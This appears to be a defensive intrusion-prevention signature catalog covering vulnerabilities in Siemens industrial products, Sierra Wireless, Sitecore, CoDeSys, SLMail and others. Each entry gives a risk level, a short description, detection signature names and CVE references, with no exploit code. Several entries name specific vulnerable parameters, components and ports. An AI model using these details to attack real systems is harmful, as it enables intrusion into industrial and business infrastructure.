Description: An SQL injection exists in Siemens SINEC NMS. The vulnerability is due to an input validation error when processing user input in SQL queries. A remote authenticated attacker could exploit this vulnerability by sending a crafted HTTP request to the targeted server. Successful exploitation could result, in the worst case, in arbitrary code execution.
Situation: File-Text_Siemens-Sinec-NMS-CVE-2021-33731-SQL-Injection
References:
CVE-2021-33731
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33731
Back to top

Siemens-Sinec-NMS-CVE-2021-33733-SQL-Injection

About this vulnerability: A vulnerability in Siemens SINEC NMS
Risk: High
First detected in: sgpkg-ips-1456-5242
Last changed: sgpkg-ips-1456-5242
Platform: Generic
Software: Siemens SINEC NMS
Type: Input Validation
Description: An SQL injection exists in Siemens SINEC NMS. The vulnerability is due to an input validation error when processing user input in SQL queries. A remote authenticated attacker could exploit this vulnerability by sending a crafted HTTP request to the targeted server. Successful exploitation could result, in the worst case, in arbitrary code execution.
Situation: HTTP_CRL-Siemens-Sinec-NMS-CVE-2021-33733-SQL-Injection
References:
CVE-2021-33733
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33733
Back to top

Siemens-Sinec-NMS-CVE-2021-37200-Directory-Traversal

About this vulnerability: A vulnerability in Siemens SINEC NMS
Risk: Moderate
First detected in: sgpkg-ips-1398-5242
Last changed: sgpkg-ips-1398-5242
Platform: Generic
Software: Siemens SINEC NMS
Type: Directory Traversal
Description: Improper validation of user-supplied paths in requests causes a directory traversal vulnerability in Siemens Sinec NMs. A successful exploit allows an attacker to access arbitrary files on the target system.
Situation: File-Text_Siemens-Sinec-NMS-CVE-2021-37200-Directory-Traversal
HTTP_CRL-Siemens-Sinec-NMS-CVE-2021-37200-Directory-Traversal
References:
CVE-2021-37200
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37200
Back to top

Siemens-Sinec-NMS-Export-Firmware-Container-Directory-Traversal

About this vulnerability: A vulnerability in Siemens SINEC NMS.
Risk: High
First detected in: sgpkg-ips-1420-5242
Last changed: sgpkg-ips-1420-5242
Platform: Generic
Software: Siemens SINEC NMS
Type: Directory Traversal
Description: A vulnerability in Siemens SINEC NMS, versions before V1.0 SP2 Update 1, which allows remote attackers to execute arbitrary code by sending a crafted HTTP request to the target server, due to improper validation of user supplied path while exporting firmware containers.
Situation: HTTP_CRL-Siemens-Sinec-NMS-Export-Firmware-Container-Directory-Traversal
References:
CVE-2021-33722
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33722
Back to top

Siemens-SIPROTEC-4-And-SIPROTEC-Compact-EN100-Ethernet-Module-DoS

About this vulnerability: A vulnerability in Siemens SIPROTEC devices.
Risk: High
First detected in: sgpkg-ips-1426-5242
Last changed: sgpkg-ips-1426-5242
Platform: Generic
Software: Siemens SIPROTEC
Type: Malfunction
Description: A vulnerability in Siemens SIPROTEC 4 and SIPROTEC Compact < V4.25 devices, which allows remote attackers to cause a denial of service condition by sending a crafted udp packet to the target device.
Situation: Generic_UDP-Siemens-SIPROTEC-4-And-SIPROTEC-Compact-EN100-Ethernet-Module-DoS
References:
CVE-2015-5374
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5374
Back to top

Siemens-Solid-Edge-ST4/ST5-WebPartHelper-ActiveX-Control-Vulnerability

About this vulnerability: A vulnerability in Siemens Solid Edge ST4/ST5
Risk: High
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Siemens Solid Edge ST4/ST5
Type: Malfunction
Description: There is a vulnerability in the WebPartHelper ActiveX control of Siemens Solid Edge ST4/ST5. The ActiveX control does not sufficiently sanitize its input, which may lead to remote code execution.
Situation: File-Text_Siemens-Solid-Edge-ST4/ST5-WebPartHelper-ActiveX-Control-Vulnerability
Back to top

Siemens-Tecnomatix-FactoryLink-CSService-File-Download

About this vulnerability: A file disclosure vulnerability in Siemens Tecnomatix FactoryLink
Risk: Moderate
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Siemens Tecnomatix FactoryLink
Type: Insecure Configuration
Description: Multiple file disclosure vulnerabilities exist in Siemens Tecnomatix FactoryLink CSService.
Situation: Generic_CS-Siemens-Tecnomatix-FactoryLink-CSService-File-Download
References:
BID-46934
http://www.securityfocus.com/bid/46934
Back to top

Siemens-Tecnomatix-FactoryLink-Multiple-Buffer-Overflows

About this vulnerability: A vulnerability in Siemens Tecnomatix FactoryLink
Risk: Moderate
First detected in: sgpkg-ips-610-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Siemens Tecnomatix FactoryLink
Type: Buffer Overflow
Description: There are multiple stack buffer overflows in Siemens Tecnomatix FactoryLink which allows remote code excution.
Situation: Generic_CS-Siemens-Tecnomatix-FactoryLink-Multiple-Buffer-Overflows
References:
OSVDB-72815
http://www.osvdb.org/72815
Back to top

Siemens-Tecnomatix-Plant-Simulation-Spp-File-Parsing-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Siemens Tecnomatix Plant Simulation
Risk: Moderate
First detected in: sgpkg-ips-1625-5242
Last changed: sgpkg-ips-1625-5242
Platform: Generic
Software: Siemens Tecnomatix Plant Simulation
Type: Buffer Overflow
Description: A stack-based buffer overflow vulnerability has been reported in Siemens Tecnomatix Plant Simulation. This vulnerability is due to insufficient validation of the length of an attribute name in the array_carr object within an SPP file. A remote attacker can exploit this vulnerability by enticing the victim to open a crafted SPP file. Successful exploitation of this vulnerability can result in arbitrary code execution under the security context of the user.
Situation: File-OLE_Siemens-Tecnomatix-Plant-Simulation-Spp-File-Parsing-Stack-Buffer-Overflow
References:
CVE-2023-27404
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27404
Back to top

Siemens-WinCC-Hard-Coded-Login

About this vulnerability: Hard-coded login credentials for Siemens WinCC
Risk: High
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Siemens SIMATIC WinCC
Type: Backdoor
Description: There are hard-coded credentials in Siemens SIMATIC WinCC allowing any user to access backend database and perform privilege escalation.
Situation: MSSQL_Siemens-WinCC-Hard-Coded-Login
References:
CVE-2010-2772
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2772
BID-41753
http://www.securityfocus.com/bid/41753
Back to top

Siemens-WinCC-MiniWeb-Denial-Of-Service

About this vulnerability: Siemens WinCC flixible runtime 2008 SP2 + SP 1, miniweb.exe Denial of Service
Risk: High
First detected in: sgpkg-ips-627-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: MiniWeb
Type: Malfunction
Description: A vulnerability in Siemens WinCC miniweb.exe that allows a remote attacker to crash the service by sending a specially crafted HTTP POST request.
Situation: HTTP_CSU-Siemens-WinCC-MiniWeb-Denial-Of-Service
Back to top

Siemens-WinCC-TIA-Portal-MiniWeb-DoS

About this vulnerability: A vulnerability in Siemens WinCC TIA Portal, allowing DoS.
Risk: High
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Siemens WinCC TIA Portal
Type: Malfunction
Description: The Siemens WinCC TIA Portal software is vulnerable to specially crafted HTTP POST requests, allowing an attacker to carry out a DoS attack, either crashing the miniweb.exe web application or consuming most of CPU resources.
Situation: HTTP_CS-Siemens-WinCC-TIA-Portal-MiniWeb-DoS
Back to top

Sierra-Wireless-ALEOS-Acemanager-Cross-Site-Scripting-CVE-2023-40461

About this vulnerability: A vulnerability in ALEOS ACEManager
Risk: High
First detected in: sgpkg-ips-1664-5242
Last changed: sgpkg-ips-1664-5242
Platform: Generic
Software: ALEOS
Type: Cross-site Scripting
Description: A stored cross-site scripting vulnerability has been reported in the ACEManager component of Sierra Wireless ALEOS Application Framework 4.16 and earlier.
Situation: HTTP_CRL-Sierra-Wireless-ALEOS-Acemanager-Cross-Site-Scripting-CVE-2023-40461
References:
CVE-2023-40461
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-40461
Back to top

Sierra-Wireless-ALEOS-Acemanager-Denial-Of-Service-CVE-2023-40459

About this vulnerability: A vulnerability in ALEOS ACEManager
Risk: High
First detected in: sgpkg-ips-1663-5242
Last changed: sgpkg-ips-1663-5242
Platform: Generic
Software: ALEOS
Type: Malfunction
Description: A denial of service vulnerability has been reported in the ACEManager component of Sierra Wireless ALEOS Application Framework 4.16 and earlier. An unauthenticated attacker can exploit this vulnerability by sending a crafted login request with an empty password tag.
Situation: HTTP_CRL-Sierra-Wireless-ALEOS-Acemanager-Denial-Of-Service-CVE-2023-40459
References:
CVE-2023-40459
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-40459
Back to top

Sierra-Wireless-ALEOS-Acemanager-File-Upload-CVE-2023-40460

About this vulnerability: A vulnerability in ALEOS ACEManager
Risk: High
First detected in: sgpkg-ips-1664-5242
Last changed: sgpkg-ips-1715-5242
Platform: Generic
Software: ALEOS
Type: Input Validation
Description: A file upload vulnerability has been reported in the ACEManager component of Sierra Wireless ALEOS Application Framework 4.16 and earlier. An authenticated attacker can upload arbitrary HTML and script content due to the improper validation of the uploaded file names and types. If the uploaded file has the same name as a legitimate ACEManager web page, the malicious version will be served instead of the original one.
Situation: HTTP_CS-Sierra-Wireless-ALEOS-Acemanager-File-Upload-CVE-2023-40460
File-TextId_Sierra-Wireless-ALEOS-Acemanager-File-Upload-CVE-2023-40460
References:
CVE-2023-40460
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-40460
Back to top

Simple-PHP-Blog-Remote-Command-Execution

About this vulnerability: A Simple PHP Blog Remote Command Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-747-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Simple PHP Blog
Type: Input Validation
Description: A vulnerability in Simple PHP Blog, versions 0.4.0 and before, where file extensions of uploaded files in upload_img_cgi.php are not properly restricted, which allows remote attackers to execute arbitrary code.
Situation: HTTP_CS-Simple-PHP-Blog-Remote-Command-Execution
References:
CVE-2005-2733
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2733
BID-14667
http://www.securityfocus.com/bid/14667
OSVDB-19012
http://www.osvdb.org/19012
Back to top

SimpleHelp-Unauthenticated-Path-Traversal-CVE-2024-57727

About this vulnerability: An attempt to exploit a vulnerability in SimpleHelp Remote Support detected
Risk: High
First detected in: sgpkg-ips-1830-5242
Last changed: sgpkg-ips-1830-5242
Platform: Generic
Software: SimpleHelp Remote Support
Type: Input Validation
Description: SimpleHelp remote support software v5.5.7 and before is vulnerable to multiple path traversal vulnerabilities that enable unauthenticated remote attackers to download arbitrary files from the SimpleHelp host via crafted HTTP requests. These files include server configuration files containing various secrets and hashed user passwords.
Situation: HTTP_CSU-SimpleHelp-Unauthenticated-Path-Traversal-CVE-2024-57727
References:
CVE-2024-57727
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-57727
Back to top

SIP-Cisco-IP-Phone-Invite-IP-Address-Denial-Of-Service

About this vulnerability: A denial of service vulnerability in Cisco IP phones
Risk: Low
First detected in: sgpkg-ips-146-2032
Last changed: sgpkg-ips-1296-5242
Platform: Cisco
Software: <os>
Type: Malfunction
Description: Cisco IP Phones 7960 and 7940 suffer from a denial of service vulnerability where a malformed SIP INVITE message can cause the phone to crash. A remote attacker can trigger the vulnerability by sending a SIP INVITE message containing a broken IP addresses string.
Situation: SIP-UDP_CS-Invite-Message-With-Broken-IP-Addresses
References:
CVE-2007-1542
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1542
BID-23047
http://www.securityfocus.com/bid/23047
Back to top

SIP-Digium-Asterisk-Invalid-RTP-Payload-Type-Number-Memory-Corruption

About this vulnerability: A memory corruption vulnerability in Digium Asterisk
Risk: High
First detected in: sgpkg-ips-150-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Digium Asterisk
Type: Malfunction
Description: There is a memory corruption vulnerability in Digium Asterisk. A remote unauthenticated attacker can exploit this vulnerability by sending a malicious SIP INVITE request with an invalid RTP payload type number to terminate the affected service or to execute arbitrary code with the privileges of the running service.
Situation: Generic_UDP-Digium-Asterisk-Invalid-RTP-Payload-Type-Number-Memory-Corruption
SIP-UDP_CS-Digium-Asterisk-Invalid-RTP-Payload-Type-Number-Memory-Corruption
References:
CVE-2008-1289
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1289
BID-28308
http://www.securityfocus.com/bid/28308
OSVDB-43416
http://www.osvdb.org/43416
Back to top

SIP-Digium-Asterisk-Multiple-SDP-Parameters-Parsing-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in Digium Asterisk SDP parameters parsing code
Risk: High
First detected in: sgpkg-ips-150-2032
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: Digium Asterisk
Type: Buffer Overflow
Description: Digium Asterisk versions earlier than 1.4.3 suffer from multiple buffer overflow vulnerabilities related to SIP message parsing. Long values passed to the SDP parameters T38FaxRateManagement or T38FaxUdpEC may trigger a stack-based buffer overflow, allowing remote attackers to execute arbitrary code.
Situation: SIP-TCP_CS-Digium-Asterisk-Multiple-SDP-Parameters-Parsing-Buffer-Overflow-2
SIP-UDP_CS-Digium-Asterisk-Multiple-SDP-Parameters-Parsing-Buffer-Overflow-2
References:
CVE-2007-2293
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2293
BID-23648
http://www.securityfocus.com/bid/23648
OSVDB-35368
http://www.osvdb.org/35368
Back to top

Siretta-Quartz-Gold-Router-OS-Command-Injection

About this vulnerability: A vulnerability in Siretta QUARTZ-GOLD
Risk: High
First detected in: sgpkg-ips-1650-5242
Last changed: sgpkg-ips-1650-5242
Platform: Generic
Software: Siretta QUARTZ-GOLD
Type: Input Validation
Description: An OS command injection vulnerability has been reported in the delfile.cgi HTTP server component of the Siretta QUARTZ-GOLD industrial routers.
Situation: HTTP_CRL-Siretta-Quartz-Gold-Router-OS-Command-Injection
References:
CVE-2022-40969
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40969
Back to top

Siretta-Quartz-Gold-Router-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Siretta QUARTZ-GOLD
Risk: High
First detected in: sgpkg-ips-1650-5242
Last changed: sgpkg-ips-1650-5242
Platform: Generic
Software: Siretta QUARTZ-GOLD
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability has been reported in the downfile.cgi HTTP server component of the Siretta QUARTZ-GOLD industrial routers. Successful exploitation of this vulnerability could lead to remote code execution.
Situation: HTTP_CRL-Siretta-Quartz-Gold-Router-Stack-Buffer-Overflow
References:
CVE-2022-38459
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38459
Back to top

Sitecom-Home-Storage-Center-Directory-Traversal

About this vulnerability: A vulnerability in Sitecom Home Storage Center
Risk: High
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Sitecom Home Storage Center
Type: Malfunction
Description: There is a directory traversal vulnerability in Sitecom Home Storage Center which allows attackers to download arbitrary files without authorization.
Situation: HTTP_CRL-Sitecom-Home-Storage-Center-Directory-Traversal
References:
OSVDB-85176
http://www.osvdb.org/85176
Back to top

Sitecore-Experience-Platform-Preauth-Deserialization-RCE

About this vulnerability: A vulnerability in Sitecore XP.
Risk: High
First detected in: sgpkg-ips-1431-5242
Last changed: sgpkg-ips-1431-5242
Platform: Generic
Software: Sitecore XP
Type: Insecure Configuration
Description: A vulnerability in Sitecore XP, versions 7.5 to 7.5.2, 8.0 to 8.0.7, 8.1 to 8.1.3, and 8.2 to 8.2.7, which allows remote attackers to execute arbitrary code through the Report.ashx page due to improper authentication checks.
Situation: HTTP_CS-Sitecore-Experience-Platform-Preauth-Deserialization-RCE
References:
CVE-2021-42237
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42237
Back to top

Sitecore-Multiple-Products-ThumbnailsAccessToken-Insecure-Deserialization

About this vulnerability: A vulnerability in Sitecore Experience Manager
Risk: Moderate
First detected in: sgpkg-ips-1857-5242
Last changed: sgpkg-ips-1857-5242
Platform: Generic
Software: Sitecore XP
Type: Input Validation
Description: Deserialization of unverified data when handling ThumbnailsAccessToken value causes a vulnerability in Sitecore. A successful exploitation allows an attacker to execute arbitrary code on the target system.
Situation: HTTP_CSH-Sitecore-Multiple-Products-ThumbnailsAccessToken-Insecure-Deserialization-CVE-2025-27218
References:
CVE-2025-27218
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27218
Back to top

Sitecore-XP-Insecure-Deserialization

About this vulnerability: An attempt to exploit a vulnerability in Sitecore XP detected
Risk: High
First detected in: sgpkg-ips-1401-5242
Last changed: sgpkg-ips-1476-5242
Platform: Windows
Software: Sitecore XP
Type: Malfunction
Description: An attempt to exploit a vulnerability in Sitecore XP detected. The vulnerable url is deprecated in the fixed version 8.0 of Sitecore XP.
Situation: HTTP_CSU-Sitecore-XP-Insecure-Deserialization
References:
CVE-2021-42237
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42237
Back to top

SixApart-Movable-Type-Code-Execution

About this vulnerability: A SixApart Movable Type Code Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-739-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Movable Type
Type: Input Validation
Description: A vulnerability in SixApart Movable Type, versions 5.2.12 and earlier, which allows remote attackers to include and execute arbitrary local Perl files and possible execute arbitrary code.
Situation: HTTP_CSU-SixApart-Movable-Type-Code-Execution
References:
CVE-2015-1592
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1592
Back to top

SkyBlueCanvas-CMS-Command-Execution

About this vulnerability: A SkyBlueCanvas CMS Command Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-699-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SkyBlueCanvas CMS
Type: Input Validation
Description: A vulnerability in SkyBlueCanvas CMS, versions before 1.1 r248-04, which allow remote attackers to execute arbitrary commands via shell metacharacters in the name, email, subject, or message parameter to index.php when the pid parameter is 4.
Situation: HTTP_CRL_SkyBlueCanvas-CMS-Command-Execution
References:
CVE-2014-1683
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1683
BID-65129
http://www.securityfocus.com/bid/65129
OSVDB-102586
http://www.osvdb.org/102586
Back to top

SKYPE-Network-Usage

About this vulnerability: Skype network usage
Risk: Moderate
First detected in: sgpkg-ips-22-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Skype
Type: Instant Messenger
Description: The Skype network can be used for audio conversations, instant messaging and file transfers among users.
Situation: HTTP_CS-SKYPE-Client-Installed
HTTP_CS-Skype-Client-Version-Check
IM-TCP_SKYPE-Login
Back to top

SKYPE-Skype4com-URI-Handler-Remote-Heap-Corruption

About this vulnerability: A heap corruption vulnerability in Skype
Risk: Moderate
First detected in: sgpkg-ips-136-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Skype
Type: Input Validation
Description: There is a heap corruption vulnerability in Skype. The vulnerability is due to a boundary error when processing crafted URL parameters. An attacker could exploit this vulnerability by enticing the target user to visit a malicious web page.
Situation: HTTP_SS-SKYPE-Skype4com-URI-Handler-Remote-Heap-Corruption
File-Text_SKYPE-Skype4com-URI-Handler-Remote-Heap-Corruption
References:
CVE-2007-5989
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5989
BID-26748
http://www.securityfocus.com/bid/26748
OSVDB-39170
http://www.osvdb.org/39170
Back to top

Skywiper-B-Trojan

About this vulnerability: Skywiper.B Trojan
Risk: High
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Skywiper.B is an espionage program that spies on the user in multiple ways. It can spread through local network or USB stick.
Situation: HTTP_CSU-Skywiper-B-Trojan-Activity-Detected
Back to top

Skyworth-GPON-HomeGateways-And-Optical-Network-Terminals-Stack-Overflow

About this vulnerability: An attempt to exploit a vulnerability in a Shenzhen Skyworth device detected
Risk: High
First detected in: sgpkg-ips-1771-5242
Last changed: sgpkg-ips-1771-5242
Platform: Generic
Software: Shenzhen Skyworth
Type: Input Validation
Description: A vulnerability in multiple Shenzhen Skyworth devices which allows remote attackers to cause a denial of service condition or possibly execute arbitrary code via a long password, due to the insufficient validation in the Web_passwd function.
Situation: HTTP_CRL-Skyworth-GPON-HomeGateways-And-Optical-Network-Terminals-Stack-Overflow
References:
CVE-2018-19524
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19524
Back to top

SLMail-POP3-Server-Password-BOF

About this vulnerability: Buffer overflow in SLMail POP3 server
Risk: High
First detected in: sgpkg-ips-279-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: BVRP Software SLMail
Type: Buffer Overflow
Description: SLMail is vulnerable to a stack-based buffer overflow, caused by a vulnerability in the POP3 server. By submitting an overly long password during authentication, a remote attacker could overflow a buffer and execute arbitrary code on the server.
Situation: POP3_MailEnable-POP-Service-Pass-Command-Buffer-Overflow
References:
CVE-2003-0264
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0264
BID-7519
http://www.securityfocus.com/bid/7519
OSVDB-11975
http://www.osvdb.org/11975
Back to top

Slowloris-HTTP-DOS-Tool

About this vulnerability: Slowloris HTTP DOS
Risk: High
First detected in: sgpkg-ips-281-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: <os>
Type: Malfunction
Description: Slowloris is denial of service tool that sends partial HTTP requests causing the HTTP server to slowly run out of resources
Situation: HTTP_CS-Slowloris-DOS
References:
CVE-2007-0086
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0086
OSVDB-33457
http://www.osvdb.org/33457
Back to top

Smail-3-Mail-From-BOF

About this vulnerability: Buffer overflow in Smail-3
Risk: High
First detected in: sgpkg-ips-44-1210
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: Smail-3
Type: Buffer Overflow
Description: Smail-3 Mail Transport Agent contains a buffer overflow. A remote attacker could send an e-mail with a specially-crafted MAIL FROM field that overflows the buffer and allows arbitrary code execution with root privileges on the vulnerable server.
Situation: SMTP_Smail-3-Mail-From-BOF2
SMTP_Smail-3-Mail-From-BOF
References:
CVE-2005-0892
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0892
BID-12899
http://www.securityfocus.com/bid/12899
OSVDB-15065
http://www.osvdb.org/15065
Back to top

Small-AVI-Container

About this vulnerability: Detects tiny RIFF-AVI video containers
Risk: Low
First detected in: sgpkg-ips-490-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Malfunction
Description: Presenting real animated content within smaller than 1 kB binary video container is very unlikely. This may indicate a client-side memory corruption or code injection attempt, such as CVE-2009-1546.
Situation: SMTP_CS-Small-AVI-Container
IMAP_SS-Small-AVI-Container
POP3_SS-Small-AVI-Container
File-RIFF_Small-AVI-Container
Back to top

Small-HTTP-Server-Msdos-Device-Name-DoS

About this vulnerability: Denial of Service (DoS) vulnerability in Small HTTP server
Risk: Low
First detected in: sgpkg-ips-18-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows 95; Windows 98
Software: Max Feoktistov Small HTTP server
Type: Malfunction
Description: Small HTTP Server is vulnerable to a Denial of Service (DoS) attack. An attacker can send a URL request appended with MSDOS device name to the server to cause the server to crash.
Situation: HTTP_CSU-Get-Msdos-Device-Name-DoS
References:
CVE-2001-0493
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0493
BID-2649
http://www.securityfocus.com/bid/2649
OSVDB-1803
http://www.osvdb.org/1803
Back to top

Smart-Install-Exploitation-Tool

About this vulnerability: An exploitation tool for Cisco Smart Install (SMI)
Risk: High
First detected in: sgpkg-ips-1061-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco SMI
Type: Misconfiguration
Description: The Smart Install Exploitation Tool (SIET) exploits the Cisco Smart Install Client protocol.
Situation: Generic_TCP-SIET-Get_Config-Command
Generic_TCP-SIET-Change_Config-Command
Generic_TCP-SIET-Update_ios-And-Execute-Command
Back to top

Smart-Software-Solutions-Codesys-Controlservice-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Smart Software Solutions CoDeSys
Risk: Moderate
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Smart Software Solutions CoDeSys
Type: Buffer Overflow
Description: A buffer overflow vulnerability has been identified in the ControlService component (CoDeSysControlService.exe) of Smart Software Solutions CoDeSys. The vulnerability is due to a boundary error when handling HTTP requests. Remote attackers could exploit this vulnerability by sending crafted requests to the vulnerable service. In a successful attack scenario, the attacker can execute arbitrary code within the context of the service which is SYSTEM. In an unsuccessful attack the process will terminate abnormally causing a denial-of-service condition.
Situation: HTTP_CRL-Smart-Software-Solutions-Codesys-Controlservice-Stack-Buffer-Overflow
References:
CVE-2011-5007
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-5007
BID-50849
http://www.securityfocus.com/bid/50849
OSVDB-77387
http://www.osvdb.org/77387
Back to top

Smart-Software-Solutions-Codesys-ENI-Server-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in CoDeSys ENI Server
Risk: High
First detected in: sgpkg-ips-607-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Smart Software Solutions CoDeSys
Type: Buffer Overflow
Description: There is a stack buffer overflow vulnerability in in Codesys ENI server which allows remote attacker to execute malicious code on target system.
Situation: HTTP_CSU-Smart-Software-Solutions-Codesys-ENI-Server-Stack-Buffer-Overflow
Back to top

Smart-Software-Solutions-Codesys-Gateway-Server-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Smart Software Solutions CoDeSys
Risk: Moderate
First detected in: sgpkg-ips-522-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Smart Software Solutions CoDeSys
Type: Buffer Overflow
Description: There is a heap buffer overflow vulnerability in 3S Smart Software CoDeSys. The vulnerability is due to insufficient input validation when parsing requests and allows overflowing a heap buffer. A remote unauthenticated attacker could exploit this vulnerability by sending crafted requests to the vulnerable service on ports 1211/TCP and 1210/TCP. Successful exploitation could result in code execution with SYSTEM privileges. Unsuccessful attack attempts could cause the affected service to terminate abnormally, causing a denial of service (DoS) condition.
Situation: Generic_CS-Smart-Software-Solutions-Codesys-Gateway-Server-Heap-Buffer-Overflow
References:
CVE-2012-4706
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4706
OSVDB-90369
http://www.osvdb.org/90369
Back to top

Smart-Software-Solutions-Codesys-Gateway-Server-Integer-Overflow

About this vulnerability: A vulnerability in Smart Software Solutions CoDeSys
Risk: Moderate
First detected in: sgpkg-ips-429-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Smart Software Solutions CoDeSys
Type: Integer Overflow
Description: An integer overflow vulnerability has been identified in the Gateway Server component of Smart Software Solutions CoDeSys. The vulnerability is due to a lack of validation of a user-provided length value which causes heap corruption. Remote attackers could exploit this vulnerability by sending crafted requests to the vulnerable service. In a successful attack scenario, the attacker can execute arbitrary code within the context of the service, which is SYSTEM. In an unsuccessful attack the process will terminate abnormally, causing a denial-of-service condition.
Situation: Generic_CS-Smart-Software-Solutions-Codesys-Gateway-Server-Integer-Overflow
References:
BID-50849
http://www.securityfocus.com/bid/50849
OSVDB-77386
http://www.osvdb.org/77386
Back to top

Smart-Software-Solutions-Codesys-Gateway-Server-Traversal

About this vulnerability: A vulnerability in Codesys Gateway server
Risk: High
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Smart Software Solutions CoDeSys
Type: Buffer Overflow
Description: There is a directory traversal vulnerability in in Smart Software Solutions CoDeSys which allows remote attacker to execute malicious code on target system.
Situation: Generic_CS-Smart-Software-Solutions-Codesys-Gateway-Server-Traversal
References:
CVE-2012-4705
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4705
Back to top

Smart-Software-Solutions-Codesys-Webserver-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in CoDeSys Webserver
Risk: High
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Smart Software Solutions CoDeSys
Type: Buffer Overflow
Description: There is a stack buffer overflow vulnerability in in Codesys Webserver which allows remote attacker to execute malicious code on target system.
Situation: HTTP_CSU-Smart-Software-Solutions-Codesys-Webserver-Stack-Buffer-Overflow
Back to top

Smartertools-Smartermail-Message-Onerror-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in SmarterTools SmarterMail
Risk: Moderate
First detected in: sgpkg-ips-1406-5242
Last changed: sgpkg-ips-1406-5242
Platform: Generic
Software: SmarterTools SmarterMail
Type: Input Validation
Description: Insufficient validation of email message contents causes a cross-site scripting vulnerability in SmarterTools SmarterMail.
Situation: File-Text_Smartertools-Smartermail-Message-Onerror-Stored-Cross-Site-Scripting
References:
CVE-2021-35519
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35519
Back to top

SmartScreen-Security-warning-Bypass-For-MSI-Files-CVE-2023-24880

About this vulnerability: An attempt to exploit a vulnerability in SmartScreen detected
Risk: High
First detected in: sgpkg-ips-1565-5242
Last changed: sgpkg-ips-1580-5242
Platform: Windows
Software: SmartScreen
Type: Input Validation
Description: An MSI signed with an invalid authenticode signature bypasses the SmartScreen Security Warning dialog. This behavior is currently exploited in the wild to deliver the Magniber ransomware.
Situation: File-Text_SmartScreen-Security-warning-Bypass-For-Script-Files-CVE-2023-24880
File-OLE_SmartScreen-Security-warning-Bypass-For-MSI-Files-CVE-2023-24880
